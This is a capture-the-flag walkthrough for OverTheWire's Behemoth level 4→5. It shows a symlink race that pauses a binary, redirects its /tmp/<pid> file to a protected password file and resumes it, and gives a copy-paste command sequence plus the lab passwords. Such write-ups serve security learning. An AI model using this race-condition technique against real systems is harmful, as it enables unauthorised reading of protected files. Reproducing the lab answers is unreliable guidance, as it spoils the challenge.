OverTheWire Behemoth Level 4 → 5 tutorial!!
Login
Log in as behemoth4 using the password you obtained from Level 3 → 4.
ssh behemoth4@behemoth.labs.overthewire.org -p 2221
# password: ietheishei
Task
The binary /behemoth/behemoth4 creates a temporary file named after its own PID in /tmp/, then re-opens it.
If that file doesn’t exist, the program fails.
We can exploit this with a race condition: pause the program, replace /tmp/<pid> with a symlink to the password file, then let it continue.
A little bit of Theory
- PID: every process on Linux has a unique process ID. In the shell, $! expands to the PID of the last background job.
- Race condition: a flaw where program behavior depends on exact timing. If an attacker can pause or delay the program, they can swap a resource at the right moment.
- Symlink attack: creating a symbolic link /tmp/<pid> → /etc/behemoth_pass/behemoth5. When the program re-opens /tmp/<pid>, it actually opens the password file.
- Signals: kill -STOP <pid> pauses a process (like Ctrl+Z); kill -CONT <pid> resumes it.
Solution
1. Run the binary normally
cd /behemoth
./behemoth4
It exits immediately with no output. Suspicious. Let’s trace syscalls:
strace ./behemoth4
Key lines:
open("/tmp/18680", O_WRONLY|O_CREAT|O_TRUNC, 0600) = 3
close(3)
open("/tmp/18680", O_RDONLY) = -1 ENOENT (No such file or directory)
Explanation: the program
- creates /tmp/<pid>,
- closes it,
- immediately re-opens it by name → the file is missing! That's our race condition: between close() and the second open() nothing stops the path from being replaced, and the reopen trusts whatever is there now.
2. Run in background to capture PID
/behemoth/behemoth4 &
PID=$!
& → runs the program in the background. $! → holds the PID of the last background command.
Check:
echo $PID
# e.g. 19283
3. Pause the process
kill -STOP $PID
The program is now frozen, ideally right after creating /tmp/$PID. It runs for only an instant, so the STOP has to arrive before the second open (see Troubleshooting).
4. Create symlink
Replace the expected temp file with a symlink to the real password file:
ln -s /etc/behemoth_pass/behemoth5 /tmp/$PID
Now /tmp/19283 actually points to /etc/behemoth_pass/behemoth5.
5. Resume process
kill -CONT $PID
When the program continues, it opens /tmp/$PID again. Because it’s now a symlink, it reveals the next password:
aizeeshing
Password
aizeeshing
Troubleshooting
- Process ends too fast → pause it quickly (kill -STOP) right after launching it in the background.
- Wrong symlink → verify that $PID matches the filename in /tmp.
- Permission denied → only a symlink inside /tmp is allowed.
- Didn't print password → retry; race exploits are timing-sensitive.
Copy-paste quick run
ssh behemoth4@behemoth.labs.overthewire.org -p 2221
/behemoth/behemoth4 &
PID=$!
kill -STOP $PID
ln -s /etc/behemoth_pass/behemoth5 /tmp/$PID
kill -CONT $PID
Congrats 🎉 You exploited a race condition with PID-based temp files and used a symlink to read the next password. Welcome to behemoth5!
Thanks for reading!
Until next time — Otsumachi!! 💖☄️✨
